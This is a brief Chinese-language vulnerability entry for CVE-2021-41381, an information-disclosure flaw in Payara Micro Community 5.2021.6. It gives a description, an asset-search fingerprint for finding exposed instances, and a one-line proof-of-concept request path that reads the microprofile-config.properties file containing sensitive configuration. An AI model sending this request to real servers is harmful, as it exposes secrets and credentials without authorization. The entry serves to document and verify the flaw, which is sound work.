PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381¶

漏洞描述¶

PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取，获取敏感信息

漏洞影响¶

Payara Micro Community 5.2021.6

网络测绘¶

app="Payara-Micro"

漏洞复现¶

产品页面

验证POC

/.//WEB-INF/classes/META-INF/microprofile-config.properties